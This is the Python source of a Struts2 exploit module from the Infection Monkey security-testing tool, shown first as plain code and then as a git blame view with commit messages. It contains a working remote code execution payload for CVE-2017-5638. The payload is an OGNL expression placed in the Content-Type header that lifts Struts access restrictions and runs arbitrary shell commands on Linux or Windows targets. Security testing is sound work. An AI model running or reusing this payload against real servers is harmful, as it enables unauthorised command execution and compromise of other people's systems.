monkey/infection_monkey/exploit/struts2.py

"""
    Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
    code used is from https://www.exploit-db.com/exploits/41570/
    Vulnerable struts2 versions <=2.3.31 and <=2.5.10
"""
import urllib2
import httplib
import unicodedata
import re

import logging
from web_rce import WebRCE

__author__ = "VakarisZ"

LOG = logging.getLogger(__name__)

DOWNLOAD_TIMEOUT = 300


class Struts2Exploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']

    def __init__(self, host):
        super(Struts2Exploiter, self).__init__(host, None)

    def get_exploit_config(self):
        exploit_config = super(Struts2Exploiter, self).get_exploit_config()
        exploit_config['dropper'] = True
        return exploit_config

    def build_potential_urls(self, ports, extensions=None):
        """
        We need to override this method to get redirected url's
        :param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
        Eg. ports: [[80, False], [443, True]]
        :param extensions: What subdirectories to scan. www.domain.com[/extension]
        :return: Array of url's to try and attack
        """
        url_list = super(Struts2Exploiter, self).build_potential_urls(ports)
        url_list = [self.get_redirected(url) for url in url_list]
        return url_list

    @staticmethod
    def get_redirected(url):
        # Returns false if url is not right
        headers = {'User-Agent': 'Mozilla/5.0'}
        request = urllib2.Request(url, headers=headers)
        try:
            return urllib2.urlopen(request).geturl()
        except urllib2.URLError:
            LOG.error("Can't reach struts2 server")
            return False

    def exploit(self, url, cmd):
        """
        :param url: Full url to send request to
        :param cmd: Code to try and execute on host
        :return: response
        """
        cmd = re.sub(r"\\", r"\\\\", cmd)
        cmd = re.sub(r"'", r"\\'", cmd)
        payload = "%%{(#_='multipart/form-data')." \
                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
                  "(#_memberAccess?" \
                  "(#_memberAccess=#dm):" \
                  "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
                  "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
                  "(#ognlUtil.getExcludedPackageNames().clear())." \
                  "(#ognlUtil.getExcludedClasses().clear())." \
                  "(#context.setMemberAccess(#dm))))." \
                  "(#cmd='%s')." \
                  "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
                  "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
                  "(#p=new java.lang.ProcessBuilder(#cmds))." \
                  "(#p.redirectErrorStream(true)).(#process=#p.start())." \
                  "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
                  "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
                  "(#ros.flush())}" % cmd
        # Turns payload ascii just for consistency
        if isinstance(payload, unicode):
            payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        try:
            request = urllib2.Request(url, headers=headers)
            # Timeout added or else we would wait for all monkeys' output
            page = urllib2.urlopen(request).read()
        except AttributeError:
            # If url does not exist
            return False
        except httplib.IncompleteRead as e:
            page = e.partial

        return page
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`"""`
			`Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )`
			`code used is from https://www.exploit-db.com/exploits/41570/`
			`Vulnerable struts2 versions <=2.3.31 and <=2.5.10`
			`"""`
			`import urllib2`
			`import httplib`
			`import unicodedata`
			`import re`

			`import logging`
Struts2 core functions 2018-07-19 18:42:01 +08:00			`from web_rce import WebRCE`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00
			`__author__ = "VakarisZ"`

			`LOG = logging.getLogger(__name__)`

Some notes fixed 2018-06-22 19:55:52 +08:00			`DOWNLOAD_TIMEOUT = 300`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00
Almost all notes fixed, but nothing tested. 2018-08-09 21:52:15 +08:00
Struts2 core functions 2018-07-19 18:42:01 +08:00			`class Struts2Exploiter(WebRCE):`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`_TARGET_OS_TYPE = ['linux', 'windows']`

			`def __init__(self, host):`
Struts2 refactored to use default_exploit_host function 2018-08-21 17:31:50 +08:00			`super(Struts2Exploiter, self).__init__(host, None)`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00
Refactored struts2 to overload get_exploit_config 2018-08-22 19:33:00 +08:00			`def get_exploit_config(self):`
			`exploit_config = super(Struts2Exploiter, self).get_exploit_config()`
			`exploit_config['dropper'] = True`
			`return exploit_config`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00
Struts2 refactored to use default_exploit_host function 2018-08-21 17:31:50 +08:00			`def build_potential_urls(self, ports, extensions=None):`
			`"""`
			`We need to override this method to get redirected url's`
			`:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]`
			`Eg. ports: [[80, False], [443, True]]`
			`:param extensions: What subdirectories to scan. www.domain.com[/extension]`
			`:return: Array of url's to try and attack`
			`"""`
struts built_potential_url's now use map function to save code 2018-08-23 18:51:11 +08:00			`url_list = super(Struts2Exploiter, self).build_potential_urls(ports)`
More pythonic and clean way to apply function to url_list 2018-08-23 19:37:31 +08:00			`url_list = [self.get_redirected(url) for url in url_list]`
Struts2 refactored to use default_exploit_host function 2018-08-21 17:31:50 +08:00			`return url_list`
Struts2 core functions 2018-07-19 18:42:01 +08:00
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`@staticmethod`
			`def get_redirected(url):`
			`# Returns false if url is not right`
			`headers = {'User-Agent': 'Mozilla/5.0'}`
			`request = urllib2.Request(url, headers=headers)`
			`try:`
			`return urllib2.urlopen(request).geturl()`
			`except urllib2.URLError:`
Cosmetic changes 2018-06-21 05:10:56 +08:00			`LOG.error("Can't reach struts2 server")`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`return False`

Struts2 core functions 2018-07-19 18:42:01 +08:00			`def exploit(self, url, cmd):`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`"""`
			`:param url: Full url to send request to`
			`:param cmd: Code to try and execute on host`
			`:return: response`
			`"""`
Struts2 refactored for framework fixes 2018-08-10 20:04:23 +08:00			`cmd = re.sub(r"\\", r"\\\\", cmd)`
			`cmd = re.sub(r"'", r"\\'", cmd)`
Some notes fixed 2018-06-22 19:55:52 +08:00			`payload = "%%{(#_='multipart/form-data')." \`
			`"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \`
			`"(#_memberAccess?" \`
			`"(#_memberAccess=#dm):" \`
			`"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \`
			`"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \`
			`"(#ognlUtil.getExcludedPackageNames().clear())." \`
			`"(#ognlUtil.getExcludedClasses().clear())." \`
			`"(#context.setMemberAccess(#dm))))." \`
			`"(#cmd='%s')." \`
			`"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \`
			`"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \`
			`"(#p=new java.lang.ProcessBuilder(#cmds))." \`
			`"(#p.redirectErrorStream(true)).(#process=#p.start())." \`
			`"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \`
			`"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \`
			`"(#ros.flush())}" % cmd`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`# Turns payload ascii just for consistency`
			`if isinstance(payload, unicode):`
			`payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')`
			`headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}`
			`try:`
			`request = urllib2.Request(url, headers=headers)`
			`# Timeout added or else we would wait for all monkeys' output`
Some notes fixed 2018-06-22 19:55:52 +08:00			`page = urllib2.urlopen(request).read()`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`except AttributeError:`
			`# If url does not exist`
			`return False`
Some notes fixed 2018-06-22 19:55:52 +08:00			`except httplib.IncompleteRead as e:`
Not yet functioning and tested, but most functions are done 2018-06-19 23:08:52 +08:00			`page = e.partial`

			`return page`